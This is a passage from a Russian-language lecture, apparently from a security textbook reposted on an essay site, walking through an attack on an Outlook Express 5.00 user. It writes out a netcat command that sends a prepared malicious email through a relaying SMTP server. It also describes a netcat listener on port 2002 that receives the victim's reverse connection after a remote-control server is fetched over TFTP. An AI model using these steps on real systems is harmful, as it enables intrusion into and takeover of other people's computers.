Лекция: Listening on (any) 2002 ...

Как следует из сообщения программы netcat, она начинает работу в режиме клиента удаленного управления, прослушивающего запросы к порту 2002, поступающие с любого хоста.

Теперь все готово для атаки. Открываем еще один диалог сеана MS-DOS и с помощью приведенной ниже команды отправляем на компьютер Alex-1 через ретранслирующий SMTP-сервер sword-2000.sword.net подготовленное письмецо с начинкой:

type attack-tftp.txt | nc -vv sword-2000.sword.net 25

Если все пройдет хорошо и Коля выберет в клиенте Outlook Express 5.00 письмо (при этом на экране компьютера Alex-1 на мгновение отобразитс диалог сеанса MS-DOS), то в диалоге клиента TFTPD32 должны отобразиться сообщения о ходе процесса загрузки файла, как это представлено на Рис. 3.

Рис. 3. Программа сервера удаленного управления успешно загружена!

Одновременно в диалоге сеанса MS-DOS, в котором запущен клиент удаленного управления netcat, отобразится сообщение об установлении связи с атакованным компьютером Alex-1 (Рис. 4).

Рис. 4. Клиент удаленного управления подсоединился к компьютеру-жертве

Чтобы убедить вас, что это — правда, в диалоге на Рис. 4 содержится результат исполнения команды ipconfig, отображающей IP-адрес компьютера, к которому только что подсоединился наш хакер Петя. Теперь он может делатьс компьютером ламера Коли что угодно — форматировать диски, копировать информацию, удалять файлы — в общем, компьютер Alex-1превращенв сетевого раба хакера Пети! И все это — только в результате отправки единственного письма!

Однако это еще не все — кроме описанной технологии вставки активного кода, в распоряжении хакеров имеются и другие методы атаки почтовых клиентов, к краткому обсуждению которых мы сейчас и приступим.

еще рефераты
Еще работы по информатике